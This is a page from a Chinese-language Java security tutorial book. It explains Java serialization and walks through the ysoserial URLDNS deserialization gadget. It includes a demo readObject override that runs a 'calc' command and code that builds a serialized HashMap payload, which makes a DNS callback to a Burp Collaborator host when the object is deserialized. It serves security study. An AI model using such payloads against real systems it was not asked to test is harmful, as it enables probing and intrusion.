Java
  • About This Book
  • 🍖Prerequisites
    • 反射
      • 反射基本使用
      • 高版本JDK反射绕过
      • 反射调用命令执行
      • 反射构造HashMap
      • 方法句柄
    • 类加载
      • 动态加载字节码
      • 双亲委派模型
      • BCEL
      • SPI
    • RMI & JNDI
      • RPC Intro
      • RMI
      • JEP 290
      • JNDI
    • Misc
      • Unsafe
      • 代理模式
      • JMX
      • JDWP
      • JPDA
      • JVMTI
      • JNA
      • Java Security Manager
  • 👻Serial Journey
    • URLDNS
    • SerialVersionUID
    • Commons Collection 🥏
      • CC1-TransformedMap
      • CC1-LazyMap
      • CC6
      • CC3
      • CC2
    • FastJson 🪁
      • FastJson-Basic Usage
      • FastJson-TemplatesImpl
      • FastJson-JdbcRowSetImpl
      • FastJson-BasicDataSource
      • FastJson-ByPass
      • FastJson与原生反序列化(一)
      • FastJson与原生反序列化(二)
      • Jackson的原生反序列化利用
    • Other Components
      • SnakeYaml
      • C3P0
      • AspectJWeaver
      • Rome
      • Spring
      • Hessian
      • Hessian_Only_JDK
      • Kryo
      • Dubbo
  • 🌵RASP
    • JavaAgent
    • JVM
    • ByteCode
    • JNI
    • ASM 🪡
      • ASM Intro
      • Class Generation
      • Class Transformation
    • Rasp防御命令执行
    • OpenRASP
  • 🐎Memory Shell
    • Tomcat-Architecture
    • Servlet API
      • Listener
      • Filter
      • Servlet
    • Tomcat-Middlewares
      • Tomcat-Valve
      • Tomcat-Executor
      • Tomcat-Upgrade
    • Agent MemShell
    • WebSocket
    • 内存马查杀
    • IDEA本地调试Tomcat
  • ✂️JDBC Attack
    • MySQL JDBC Attack
    • H2 JDBC Attack
  • 🎨Templates
    • FreeMarker
    • Thymeleaf
    • Enjoy
  • 🎏MessageQueue
    • ActiveMQ CNVD-2023-69477
    • AMQP CVE-2023-34050
    • Spring-Kafka CVE-2023-34040
    • RocketMQ CVE-2023-33246
  • 🛡️Shiro
    • Shiro Intro
    • Request URI ByPass
    • Context Path ByPass
    • Remember Me反序列化 CC-Shiro
    • CB1与无CC依赖的反序列化链
  • 🍺Others
    • Deserialization Twice
    • A New Blazer 4 getter RCE
    • Apache Commons Jxpath
    • El Attack
    • Spel Attack
    • C3P0原生反序列化的JNDI打法
    • Log4j
    • Echo Tech
      • SpringBoot Under Tomcat
    • CTF 🚩
      • 长城杯-b4bycoffee (ROME反序列化)
      • MTCTF2022(CB+Shiro绕过)
      • CISCN 2023 西南赛区半决赛 (Hessian原生JDK+Kryo反序列化)
      • CISCN 2023 初赛 (高版本Commons Collections下其他依赖的利用)
      • CISCN 2021 总决赛 ezj4va (AspectJWeaver写字节码文件到classpath)
      • D^3CTF2023 (新的getter+高版本JNDI不出网+Hessian异常toString)
      • WMCTF2023(CC链花式玩法+盲读文件)
      • 第六届安洵杯网络安全挑战赛(CB PriorityQueue替代+Postgresql JDBC Attack+FreeMarker)
  • 🔍Code Inspector
    • CodeQL 🧶
      • Tutorial
        • Intro
        • Module
        • Predicate
        • Query
        • Type
      • CodeQL 4 Java
        • Basics
        • DFA
        • Example
    • SootUp ✨
      • Intro
      • Jimple
      • DFA
      • CG
    • Tabby 🔦
      • install
    • Theory
      • Static Analysis
        • Intro
        • IR & CFG
        • DFA
        • DFA-Foundation
        • Interprocedural Analysis
        • Pointer Analysis
        • Pointer Analysis Foundation
        • PTA-Context Sensitivity
        • Taint Anlysis
        • Datalog
Powered by GitBook
On this page
  • 0x01 Preface
  • 0x02 New Experience
  • 0x03 Best Practice

Was this helpful?

  1. 👻Serial Journey

URLDNS

0x01 Preface

Java序列化:指把Java对象转换为字节序列的过程,便于保存在内存、文件、数据库中 ObjectOutputStream类的writeObject()方法可以实现序列化

Java反序列化:指把字节序列恢复为Java对象的过程, ObjectInputStream类的readObject()方法用于反序列化

一个类要能反序列化需满足下面条件

  1. 该类必须实现java.io.Serializable接口

  2. 该类的所有属性必须是可序列化的

反序列化利用条件

  1. 有反序列化接口,即能读入反序列化字节并执行readObject()方法

  2. 有可利用的类,即readObject方法能连接到其他可利用点的类

注意:

  • 静态成员变量不能被序列化(序列化是针对对象属性的,而静态成员变量属于类)

  • transient标识的对象成员变量不参加反序列化(反序列化后值为null)

0x02 New Experience

创建一个Person类,注意这个类需要实现java.io.Serializable接口

序列化:

import java.io.FileOutputStream;
import java.io.ObjectOutputStream;

public class Serialization {
    public static void main(String[] args) throws Exception {
        Person person = new Person("Billy", 18);
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(person);
    }
}

反序列化:

import java.io.FileInputStream;
import java.io.ObjectInputStream;

public class Deserialize {
    public static void main(String[] args) throws Exception{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("ser.bin"));
        Object person = ois.readObject();
        System.out.println(person);
    }
}

从反序列化到漏洞?

  1. 入口类的readObject直接调用危险方法

  2. 入口类参数中包含可控类,该类有危险方法,readObject时调用

  3. 入口类参数中包含可控类,该类又调用其他有危险方法的类,readObject时调用

// Person类中重写readObject
private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
    ois.defaultReadObject();
    Runtime.getRuntime().exec("calc");
}

此时执行反序列化操作就会触发Runtime.getRuntime().exec("calc");

对于利用链上的类,都需要实现Serializable接口、或继承该接口的实现类

  • Source:入口类(重写readObject调用常见方法,参数类型宽泛,最好jdk自带)

  • Gadget Chain:调用链(相同方法名、相同参数类型、不同调用过程)

  • Sink:执行类(RCE、SSRF、写文件...)

常见方法:toString、hashCode、equals

在后面的CC链中经常看到HashMap作为入口类,它实现了Serializable接口且作为jdk自带的类,readObject中调用了常见方法hashCode,是不错的入口类。

0x03 Best Practice

以ysoserial上的URLDNS为例:

上面讲到HashMap的readObject会调用hashCode()方法

// HashMap#readObject
// Read the keys and values, and put the mappings in the HashMap
for (int i = 0; i < mappings; i++) {
    K key = (K) s.readObject();
    V value = (V) s.readObject();
    putVal(hash(key), key, value, false, false);
}
// ====================================================================
// HashMap#hash
// 调用hash是为保证键的唯一性
static final int hash(Object key) {
    int h;
    return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}

hash方法的参数key的类型是Object,满足参数类型宽泛

最后会调用键对象的hashCode方法。

下面看看URL类的hashCode方法

// URL#hashCode
public synchronized int hashCode() {
    if (hashCode != -1)
        return hashCode;
    
    hashCode = handler.hashCode(this);
    return hashCode;
}
// URLStreamHandler#hashCode
protected int hashCode(URL u) {
    InetAddress addr = getHostAddress(u);
    // ....
}

hashCode == -1时会调用handler.hashCode,而URL类初始化的时候hashCode就被赋值-1

查看URL类的handler定义 transient URLStreamHandler handler;

getHostAddress用于获取IP地址,发送请求给DNS【可用于检查是否存在SSRF】


还有一个问题:在构造hashMap时调用put实际上会改变key的hashCode

public V put(K key, V value) {
    return putVal(hash(key), key, value, false, true);
}

这时候就已经触发URLStreamHandler#hashCode->getHostAddress发起了一个DNS请求,会干扰反序列化时发起的DNS请求。

如果put的时候URL类的hashCode != -1就不会触发DNS请求 可以通过反射来修正。

HashMap<URL, Integer> hashMap = new HashMap<>();
URL url = new URL("http://pun5j25rm4k6pazbyzmbukp9g0mtai.oastify.com");
// 通过反射修改 hashCode != -1
Field h = url.getClass().getDeclaredField("hashCode");
h.setAccessible(true);
h.set(url, 123456);
hashMap.put(url, 1);
// put之后再修改回来
h.set(url, -1);

ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
oos.writeObject(hashMap);

可以通过Burp的Collaborator client来接收DNS请求

PreviousJava Security ManagerNextSerialVersionUID

Last updated 2 years ago

Was this helpful?